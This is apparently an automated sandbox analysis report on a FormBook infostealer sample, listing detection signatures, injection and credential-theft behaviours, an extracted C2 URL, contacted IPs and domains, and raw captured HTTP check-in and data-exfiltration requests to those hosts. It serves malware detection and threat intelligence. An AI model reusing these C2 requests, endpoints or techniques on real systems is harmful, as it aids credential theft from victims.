Windows Analysis Report
NHYGUnNN.exe

Overview

General Information

Sample Name: NHYGUnNN.exe
Analysis ID: 756156
MD5: 4f9c8432b57fa1aa875071de547ba947
SHA1: e1cc52fd851621743ba562a65161bfafed8e6b2b
SHA256: 9f0d17930a9312b8d8dfb23119b57fed676a1bb15fc1582754ab94201651b221
Tags: exeformbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: NHYGUnNN.exe ReversingLabs: Detection: 27%
Yara detected FormBook
Source: Yara match File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: NHYGUnNN.exe Joe Sandbox ML: detected
Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.needook.com/4u5a/"]}
Source: NHYGUnNN.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdb source: NHYGUnNN.exe
Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdb source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdbBSJB source: NHYGUnNN.exe
Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdbBSJB source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BD2CA0 FindFirstFileW,FindNextFileW,FindClose, 10_2_00BD2CA0
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 10_2_00BC88B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 10_2_00BC88AF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 10_2_00BC4376

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 38.55.236.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.darkchocolatebliss.com
Source: C:\Windows\explorer.exe Domain query: www.marketmall.digital
Source: C:\Windows\explorer.exe Network Connect: 172.67.148.132 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 54.38.220.85 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.209.6.241 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 89.31.143.1 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.canadianlocalbusiness.com
Source: C:\Windows\explorer.exe Domain query: www.y31jaihdb6zm87.buzz
Source: C:\Windows\explorer.exe Network Connect: 162.213.255.142 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.ope-cctv.com
Source: C:\Windows\explorer.exe Domain query: www.dersameh.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2829004 ETPRO TROJAN FormBook CnC Checkin (POST) 192.168.2.6:49722 -> 154.209.6.241:80
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.needook.com/4u5a/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View ASN Name: QSC-AG-IPXDE QSC-AG-IPXDE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1Host: www.ope-cctv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1Host: www.dersameh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1Host: www.marketmall.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1Host: www.canadianlocalbusiness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 89.31.143.1 89.31.143.1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 67 55 49 7a 31 2d 55 52 64 63 28 79 52 35 48 51 7e 59 4c 4c 35 72 75 31 30 79 78 5a 6b 52 36 5f 76 35 64 77 58 51 59 4e 35 56 4c 5a 6b 66 43 4b 44 4c 75 4c 28 46 76 59 79 38 4b 33 78 72 33 55 32 38 37 33 28 36 58 61 54 56 44 39 4a 69 53 7a 62 51 55 45 64 6d 57 53 53 45 59 6a 4b 4c 68 4a 28 6e 61 47 54 67 61 49 66 65 35 64 4a 72 4b 55 73 41 68 57 56 47 76 44 4b 61 43 54 77 78 78 39 38 34 77 68 4c 53 30 69 51 37 67 37 48 31 63 69 4e 79 45 48 30 58 30 39 51 39 61 64 39 36 4e 69 68 59 77 5f 6b 74 7a 49 28 57 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=OMUyI4HK512-gUIz1-URdc(yR5HQ~YLL5ru10yxZkR6_v5dwXQYN5VLZkfCKDLuL(FvYy8K3xr3U2873(6XaTVD9JiSzbQUEdmWSSEYjKLhJ(naGTgaIfe5dJrKUsAhWVGvDKaCTwxx984whLS0iQ7g7H1ciNyEH0X09Q9ad96NihYw_ktzI(Wo.
Source: global traffic HTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 68 33 51 7a 33 64 38 52 56 63 28 78 65 5a 48 51 72 49 4b 6a 35 72 69 31 30 7a 6b 55 6a 6e 4b 5f 76 50 42 77 58 79 41 4e 31 31 4c 5a 69 66 43 4f 65 62 76 51 28 46 72 2d 79 39 61 42 78 70 37 55 33 62 66 33 75 73 6a 64 59 46 44 46 4c 53 54 6c 62 51 56 4f 64 6d 47 65 53 45 55 61 4b 4c 70 4a 28 52 4f 47 57 51 61 4c 61 65 35 64 4a 72 4b 59 73 41 67 48 56 43 37 62 4b 61 71 44 33 43 35 39 28 5a 51 68 4a 7a 30 6c 42 72 68 38 62 6c 64 50 42 43 46 37 79 47 42 46 59 65 4b 2d 69 72 38 4b 6c 5a 4e 72 7e 63 62 44 68 78 61 54 7a 5f 4f 49 4e 79 6e 37 54 6f 57 4d 7e 73 51 33 6f 50 6f 4c 61 70 4f 41 33 41 36 30 6e 4f 67 6a 46 4d 57 69 72 52 4c 68 35 30 69 78 72 4b 6a 41 64 51 72 76 36 51 53 37 6a 33 51 72 53 5f 7e 5a 73 30 38 36 72 45 34 52 74 77 56 4c 7a 48 6d 4d 54 4b 7e 44 62 58 62 5f 4e 51 47 6d 69 62 37 4a 46 4e 49 55 53 47 36 39 74 48 4a 75 4d 64 63 5f 63 2d 30 61 55 6e 6b 4c 58 46 54 48 31 5a 48 61 49 6e 42 50 63 37 65 6f 55 4e 79 2d 6f 4f 34 61 6a 38 53 65 47 5f 66 6a 65 70 7a 71 69 72 65 46 6f 44 53 51 5a 31 74 76 65 43 57 71 57 6d 32 4f 69 5a 51 4b 78 5f 38 31 67 48 51 72 53 7a 43 5f 63 6a 63 4c 64 6a 46 69 62 35 41 74 55 49 7e 67 34 53 52 48 51 5a 7a 51 75 52 59 41 62 39 50 35 79 66 54 4d 61 4b 38 61 4b 73 72 69 64 78 4d 68 30 77 48 61 76 69 5a 45 5a 68 42 30 78 35 41 32 4f 70 46 66 33 6c 55 54 70 61 71 31 56 4e 36 42 38 52 34 6f 63 44 58 31 7e 74 6f 68 7a 68 4e 56 46 63 61 69 34 6e 47 78 79 32 45 62 6a 65 38 49 7e 37 48 62 31 7a 65 79 61 6f 4d 6b 43 77 5a 42 69 65 30 4c 41 69 56 63 30 74 46 76 42 53 31 47 79 67 55 2d 46 42 64 46 33 65 4c 4f 4d 2d 28 44 34 78 4f 71 70 4b 5a 5f 39 2d 42 67 73 47 79 77 64 33 57 70 7e 53 52 35 36 6b 7a 6e 56 52 4e 77 6f 44 6d 55 72 6e 50 43 48 42 31 42 7e 65 6e 4b 32 55 44 44 6c 71 32 71 62 32 42 6d 4a 51 7a 58 67 6e 35 2d 52 2d 48 55 56 50 57 6b 62 44 5a 71 49 61 6e 33 68 53 57 55 4e 62 50 55 52 39 6d 47 57 41 62 6b 37 48 55 58 4b 46 7e 36 4b 41 34 5f 41 34 5a 70 56 42 49 47 39 54 66 30 75 31 5a 4b 34 69 49 36 4f 44 49 59 39 73 48 7a 71 6a 7e 78 6a 52 36 44 4d 79 50 69 54 5a 4d 39 39 5f 63 6f 63 63 65 46 74 6e 54 58 32 31 47 35 75 5f 7e 33 6f 30 71 72 6a 57 7a 79 4b 49 52 5f 4b 54 6d 62 28 5f 66 41 79 37 32 45 7a 51 4a 43 75 44 7e 32 28 53 49 75 65 47 30 52 43 55 4c 56 41 33 65 59 7e 46 4d 6d 77 51 59 71 72 56 45 61 44 52 71 61 53 6a 77 57 44 57 28 72 76 69 67 31 4e 77 73 77 7a 65 34 34 73 50 7e 46 4e 34 4e 50 48 46 66 55 30 55 33 54 62 2d 4c 42 6a 37 78 4d 34 76 34 66 75 2d 62 36 50 63 41 7a 6b 59 34 64 50 67 48 56 52 30 72 39 68 75 71 6d 33 55 4e 66 30 69 78 4d 41 58 4a 75 7a 6
Source: global traffic HTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.darkchocolatebliss.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.darkchocolatebliss.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6b 78 6b 2d 48 45 6d 75 43 65 6c 57 71 4e 67 47 36 79 57 44 69 72 48 68 79 33 54 50 70 4d 63 69 4e 37 30 42 7e 43 65 42 52 4b 77 31 74 30 41 47 57 35 77 36 33 42 7a 51 7e 68 75 4b 4d 2d 36 30 32 65 70 42 77 49 69 43 6b 59 30 75 6a 58 61 44 67 55 67 47 47 78 4a 44 4b 75 35 38 78 4d 37 7a 54 34 4b 56 77 5f 4a 54 7e 65 61 5f 6c 47 67 50 36 69 62 4b 6f 64 64 31 76 4e 33 69 49 64 5a 35 69 52 4e 56 6a 6c 44 76 44 59 50 6c 54 6e 72 6b 4a 64 6e 5a 38 46 6a 78 68 7a 74 6e 71 5a 47 44 30 4e 61 36 58 50 6b 69 36 31 46 53 36 30 77 69 56 41 28 74 69 70 30 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=kxk-HEmuCelWqNgG6yWDirHhy3TPpMciN70B~CeBRKw1t0AGW5w63BzQ~huKM-602epBwIiCkY0ujXaDgUgGGxJDKu58xM7zT4KVw_JT~ea_lGgP6ibKodd1vN3iIdZ5iRNVjlDvDYPlTnrkJdnZ8FjxhztnqZGD0Na6XPki61FS60wiVA(tip0.
Source: global traffic HTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.darkchocolatebliss.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.darkchocolatebliss.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6b 78 6b 2d 48 45 6d 75 43 65 6c 57 6f 75 6f 47 34 54 57 44 7a 62 48 2d 73 48 54 50 77 63 63 6d 4e 37 34 42 7e 47 47 52 52 38 51 31 73 6d 34 47 58 61 49 36 36 68 7a 51 70 78 75 4f 50 4f 37 32 32 65 39 4e 77 4a 54 67 6b 61 59 75 69 30 69 44 6d 57 49 48 66 52 4a 64 64 4f 35 7a 78 4d 37 63 54 34 61 52 77 5f 4d 49 7e 61 32 5f 6c 56 59 50 72 79 62 4c 6e 39 64 31 76 4e 33 75 49 64 59 6f 69 58 6c 33 6a 6b 4c 46 43 71 48 6c 54 43 6e 6b 61 71 62 59 30 6c 69 34 28 44 73 72 73 4c 66 75 73 37 62 4f 66 2d 41 61 73 33 46 4f 36 57 46 52 51 79 37 47 33 4a 63 38 35 6a 52 69 32 67 73 52 4a 4e 6f 33 6e 61 41 5a 4f 74 6c 2d 54 42 74 44 7a 4a 66 65 42 31 34 61 44 4d 6b 37 74 79 6a 56 62 49 36 77 57 59 39 30 73 36 28 30 44 57 50 35 4a 61 6f 79 78 72 4a 76 64 65 49 30 28 4f 54 4c 46 48 34 70 44 7a 6e 34 28 32 6f 78 7a 4f 62 71 73 6b 33 49 59 36 63 45 30 76 47 78 71 39 35 33 65 4b 6f 43 41 33 4d 41 6e 75 44 36 4a 49 4a 67 6a 66 65 5f 42 4d 47 77 4b 54 72 4a 6e 38 6c 5f 36 63 49 41 6b 50 4d 70 77 43 6d 32 6e 53 75 57 7a 7a 50 30 73 47 61 77 54 4f 52 63 31 53 38 69 76 33 75 30 51 70 62 37 34 6b 6b 6a 32 67 38 39 72 58 68 32 55 75 39 48 51 49 58 6b 43 35 75 44 73 6f 7e 78 6d 59 51 54 46 4e 70 55 41 35 68 54 59 5a 63 57 79 58 41 70 4e 6e 72 5f 72 6b 38 58 63 50 66 51 70 34 34 37 6b 6e 28 71 50 32 6b 57 52 36 37 69 53 6f 76 67 77 44 6f 53 4f 35 54 34 56 54 73 4e 68 76 46 4b 6a 38 4e 34 63 71 4e 53 59 33 33 57 4a 32 4a 73 64 67 70 47 41 78 39 6a 34 38 77 37 67 51 7a 32 46 49 44 72 34 71 63 59 44 45 72 71 75 31 38 30 39 33 57 36 5a 72 6f 47 76 50 79 69 70 6b 45 42 57 68 35 32 51 78 4c 31 37 5a 64 65 4c 46 73 76 52 69 61 42 62 75 59 4a 55 5a 6e 52 56 4b 4e 5a 34 42 7e 35 51 67 58 79 57 6e 4c 79 62 2d 72 31 77 74 47 36 5a 74 70 53 4e 78 59 49 65 6d 41 42 56 7a 75 2d 66 65 4c 41 77 43 71 53 53 4b 71 52 49 37 46 67 7e 6c 50 53 59 55 4b 69 47 44 38 73 43 75 38 33 4b 30 4d 66 38 66 4f 37 38 6f 46 50 42 69 37 58 46 72 59 75 5a 4e 53 45 4b 38 7a 71 38 5f 56 50 79 78 34 47 67 67 75 52 54 43 61 77 33 4b 6f 5f 54 46 48 49 5a 59 58 58 5a 43 32 67 38 34 71 74 73 42 66 75 72 41 45 34 6e 43 38 75 48 71 62 42 36 34 78 42 38 45 30 38 77 46 6b 35 67 42 33 66 30 4a 58 71 54 38 49 71 75 51 41 78 6b 6a 6c 67 54 33 4d 6b 49 69 66 56 28 39 43 39 50 7a 44 35 32 30 7a 69 64 61 67 47 4c 4f 4d 43 61 68 56 68 64 54 47 5a 47 43 6b 35 55 76 65 76 28 57 30 76 65 59 5a 74 7e 37 74 37 61 53 57 68 30 65 51 6c 33 6e 7e 57 65 45 50 79 74 31 79 6b 32 69 74 74 5a 73 4c 61 61 77 62 4a 61 4e 30 43 4a 54 6c 46 78 44 73 53 47 50 78 6d 78 7a 47 62 6f 65 46 41 63 6b 64 6c 53 62 30 3
Source: global traffic HTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.y31jaihdb6zm87.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.y31jaihdb6zm87.buzz/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 66 6a 65 6d 53 6c 4c 42 38 6e 67 6c 33 72 48 49 65 79 58 61 59 34 6d 63 63 4e 51 65 44 58 74 30 4c 59 77 79 6f 55 64 32 5f 74 54 54 6d 57 31 44 76 53 65 74 37 57 6b 55 5f 70 6a 35 72 5a 37 6e 58 7a 41 57 39 57 70 73 78 66 51 6e 4d 76 79 4a 35 51 56 4c 68 67 57 55 6b 4a 6a 37 55 64 56 6a 5f 76 33 35 4a 44 64 42 63 69 75 53 44 32 44 70 6e 66 70 31 49 70 6d 62 75 74 64 56 48 75 77 6f 5f 43 79 54 6a 78 38 39 49 4a 79 6d 62 75 39 56 57 56 31 52 61 4e 34 64 62 59 70 33 58 39 77 61 38 4f 46 42 6d 53 30 50 63 65 57 61 43 7e 51 70 33 65 50 4a 30 73 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=lfjemSlLB8ngl3rHIeyXaY4mccNQeDXt0LYwyoUd2_tTTmW1DvSet7WkU_pj5rZ7nXzAW9WpsxfQnMvyJ5QVLhgWUkJj7UdVj_v35JDdBciuSD2Dpnfp1IpmbutdVHuwo_CyTjx89IJymbu9VWV1RaN4dbYp3X9wa8OFBmS0PceWaC~Qp3ePJ0s.
Source: global traffic HTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.y31jaihdb6zm87.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.y31jaihdb6zm87.buzz/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 66 6a 65 6d 53 6c 4c 42 38 6e 67 6c 33 72 48 49 65 79 58 61 59 34 6d 63 63 4e 51 65 44 58 74 30 4c 59 77 79 6f 55 64 32 5f 74 54 54 6d 57 31 44 76 53 65 74 37 57 6b 55 5f 70 6a 35 72 5a 37 6e 58 7a 41 57 39 57 70 73 78 66 51 6e 4d 76 79 4a 35 51 56 4c 68 67 57 55 6b 4a 6a 37 55 64 56 6a 5f 76 33 35 4a 44 64 42 63 69 75 53 44 32 44 70 6e 66 70 31 49 70 6d 62 75 74 64 56 48 75 77 6f 5f 43 79 54 6a 78 38 39 49 4a 79 6d 62 75 39 56 57 56 31 52 61 4e 34 64 62 59 70 33 58 39 77 61 38 4f 46 42 6d 53 30 50 63 65 57 61 43 7e 51 70 33 65 50 4a 30 73 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=lfjemSlLB8ngl3rHIeyXaY4mccNQeDXt0LYwyoUd2_tTTmW1DvSet7WkU_pj5rZ7nXzAW9WpsxfQnMvyJ5QVLhgWUkJj7UdVj_v35JDdBciuSD2Dpnfp1IpmbutdVHuwo_CyTjx89IJymbu9VWV1RaN4dbYp3X9wa8OFBmS0PceWaC~Qp3ePJ0s.
Source: global traffic HTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.y31jaihdb6zm87.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.y31jaihdb6zm87.buzz/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 66 6a 65 6d 53 6c 4c 42 38 6e 67 6b 58 62 48 4b 5f 79 58 4e 49 34 68 54 38 4e 51 46 7a 58 70 30 4c 55 77 79 70 51 4e 32 4a 4e 54 54 31 75 31 48 39 4b 65 72 37 57 6b 53 5f 6f 72 6b 37 5a 55 6e 58 33 69 57 39 47 35 73 7a 54 51 6d 76 6e 79 43 61 6f 55 44 78 67 55 51 6b 4a 67 37 55 64 41 6a 5f 28 6f 35 4a 48 37 42 63 71 75 53 78 65 44 76 58 66 6d 72 34 70 6d 62 75 74 76 56 48 76 54 6f 37 6e 68 54 6e 38 35 39 61 52 79 6f 66 79 39 51 78 68 79 5a 36 4e 38 55 37 59 34 7a 31 34 53 58 4f 43 41 4a 55 6d 4d 51 65 57 63 59 31 44 75 74 47 61 2d 4b 68 64 6f 56 56 48 4c 4c 37 43 6c 70 5a 51 39 4d 66 38 64 44 48 59 49 52 52 7a 56 70 64 53 33 7e 50 7e 4c 36 71 55 5a 71 4b 4e 67 77 48 38 77 43 34 61 71 59 47 45 7a 34 61 31 36 65 51 44 44 5a 59 46 4c 57 71 36 68 42 65 45 48 47 76 4d 4c 68 65 4f 63 75 51 36 41 4e 31 67 79 57 6a 4b 70 4b 71 78 50 78 70 4b 31 44 77 46 44 67 31 42 46 58 6a 46 6e 6f 31 6a 72 45 46 47 58 6b 58 6f 48 58 70 33 5a 51 62 5a 73 4c 51 31 69 71 57 44 6a 55 34 41 53 42 41 52 6e 6b 32 31 64 4d 43 67 4e 7a 39 45 61 46 67 57 62 67 69 53 53 42 55 4a 59 38 70 57 42 43 79 71 51 6c 66 38 43 44 61 42 39 42 6e 6e 77 36 50 41 78 62 72 67 6c 4a 43 32 42 33 42 28 57 64 38 66 36 51 77 32 6f 42 56 49 46 6e 74 50 77 7e 4c 34 6e 68 7a 71 51 58 50 34 61 78 46 46 32 43 47 4d 54 37 44 6d 72 45 34 42 51 39 4d 31 68 77 43 4a 77 47 65 61 57 61 42 46 72 69 46 51 7a 72 2d 37 58 66 30 7e 6c 55 6b 76 71 6d 6e 75 65 63 6b 51 5f 37 4b 46 77 68 36 4d 64 72 61 76 4d 71 41 61 41 62 7a 4a 79 5a 7a 68 41 61 6a 38 50 67 53 49 63 37 4a 6e 70 49 7a 67 46 4c 30 79 5a 77 6e 7a 65 35 37 4b 50 30 4d 6f 4e 38 5a 52 32 71 32 51 37 7a 49 35 58 4c 62 6a 52 71 44 6b 4d 7a 63 70 55 68 6c 45 43 44 52 61 6a 71 6c 41 49 5a 59 35 63 56 6f 55 58 6d 4f 6b 6a 68 63 77 42 31 38 68 4b 71 49 55 54 73 47 6f 47 67 4e 67 2d 52 74 30 55 51 70 47 64 67 69 43 6b 7e 72 6d 45 57 56 35 62 7e 37 34 59 6f 6c 64 69 68 44 42 38 4f 4f 36 2d 62 35 64 58 72 66 42 51 57 4b 45 74 45 6c 42 77 52 33 70 7a 58 49 45 6b 46 41 7e 48 41 4b 47 44 48 45 73 66 63 79 6a 43 72 7a 61 76 6c 4f 4d 6e 58 41 69 7a 71 53 65 41 35 41 28 4b 41 72 4a 5f 45 74 42 4e 55 38 68 2d 4e 4b 70 62 4b 6c 32 53 47 37 6a 55 31 56 31 4c 31 62 5a 57 76 30 57 41 75 44 38 61 52 6a 46 4a 71 48 41 51 6a 67 34 6f 34 69 4b 4e 6b 7a 69 7a 79 42 42 4d 44 67 39 37 45 47 64 64 4f 68 52 4b 76 7a 30 79 